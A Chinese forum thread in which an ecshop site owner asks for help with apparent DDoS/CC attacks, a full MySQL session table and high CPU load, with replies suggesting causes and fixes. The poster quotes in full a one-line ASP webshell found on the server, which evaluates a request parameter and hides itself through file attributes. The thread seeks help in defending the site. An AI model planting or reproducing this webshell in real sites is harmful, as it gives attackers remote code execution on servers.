网站受到攻击,请教原因??

2016-07-07 14:55 来源:www.chinab4c.com 作者:ecshop专家



网站这几天经常收到疑为dddos攻击,但是查询流量显示正常,也不是UDP 发包,但是网站经常打开就提示以下的错误,把ecs_sessi**表清空了,很快就有几百条记录出现了,而且user_name和 userid 全部为0,如果是用户正常登录不应为为0,现在怀疑是不是 那些登陆页面被利用了 还是?? 用了很多软件查杀了 木马 查到一个 一句话木马,删除了 ,还是网站的问题依然不能正常使用,CPU很高,请教各位高手,这样到底是什么原因的呢?应该怎么解决的呢?谢谢

一句话木马 .asp文件,该文件里面的代码是这样的:

<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>



MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => INSERT INTO `xxxsjk`.`ecs_sessi**` (sesskey, expiry, ip, data) VALUES ('e45184c0aa4041d4311f49f908cde915', '1339255681', '180.136.101.235', 'a:0:{}') ) [2] => Array ( [error] => The table 'ecs_sessi**' is full ) [3] => Array ( [errno] => 1114 ) )



回答:
这个asp应该不是造成session表满的原因

cc攻击吧

可能是 ccdos !很难处理

看下IP是哪些。

最近老是碰见 加黑链的 改了FTP密码都没用

最近老是碰见 加黑链的 改了FTP密码都没用
358141860 发表于 2012-6-11 00:08

被放后门了,改FTP没有用的。后门又不用ftp传文件。




看下浏览日志ip,不一定是攻击
也可能是不认识的爬虫



谢谢各位的回答,之前确实是ddos攻击,后来我加到360网站宝后,就改变了攻击方式;服务器上装了防火墙软件,以及任务管理器,入网和出网的流量都不大,看了日志IP,没有什么异常,只是根据防火墙记录有个IP攻击3306端口,想想是不是只想远程向数据库频繁的添加数据呢?但是3306我是关闭了对外开放,session表满的原因目前还没找到,因为这个所谓的黑客暂停了攻击,等他下次再攻击再观察,再给大家反馈,谢谢

fso 是asp上传的木马吧
是IIS服务器对吧? 自己的主机的话 建议吧fso关闭

进来向高手学习一下!